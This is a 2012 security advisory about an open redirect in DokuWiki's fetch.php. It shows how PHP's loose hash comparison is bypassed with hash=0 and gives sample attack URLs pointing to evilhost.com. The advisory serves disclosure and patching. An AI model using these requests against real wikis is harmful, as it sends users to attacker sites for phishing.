PT-2012-52: Open Redirect in DokuWiki

Vulnerable software

DokuWiki
Version: 2012-10-13 "Adora Belle" and earlier

Application link:
http://www.splitbrain.org/projects/dokuwiki

Severity level

Severity level: Medium
Impact: Open Redirect
Access Vector: Remote

CVSS v2:
Base Score: 5.0
Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)

CVE: not assigned

Software description

DokuWiki is a simple to use Wiki aimed at the documentation needs of a small company. It works on plain text files and thus needs no database.

Vulnerability description

Positive Research Center experts have discovered an open redirect issue in /lib/exe/fetch.php. A legitimate query looks like as follows:

/lib/exe/fetch.php?media=http://i.imgur.com/IX1g8.jpg&hash=4fae2b

The "hash" parameter is meant to protect the web application from open redirect and is calculated as follows:

substr(md5(auth_cookiesalt().$media),0,6)

The value of auth_cookiesalt() cannot be accessed, however the "hash" parameter and first 6 characters of the resulting MD5 are incorrectly compared:

if(substr(md5(auth_cookiesalt().$media),0,6) != $_REQUEST['hash']){
  return array( 412, 'Precondition Failed');
}

Consider the case when an attacker consecutively sends requests like this:

/lib/exe/fetch.php?media=http://evilhost.com/?1&hash=0
/lib/exe/fetch.php?media=http://evilhost.com/?2&hash=0
...
/lib/exe/fetch.php?media=http://evilhost.com/?100&hash=0
...

Within a few thousand requests the first 6 characters of MD5 (e.g. 0e1234, 0e1337) will match 0 and, thus, the protection will be bypassed.

How to fix

Update your software up to the latest version.

Advisory status

22.10.2012 - Vendor gets vulnerability details
06.03.2013 - Vendor releases fixed version and details
19.03.2013 - Public disclosure

Credits

The vulnerability was discovered by Arseniy Reutov, Positive Research Center (Positive Technologies Company)

References

http://en.securitylab.ru/lab/PT-2012-52

Reports on the vulnerabilities previously discovered by Positive Research:

http://ptsecurity.com/research/advisory/
http://en.securitylab.ru/lab/

Threatscape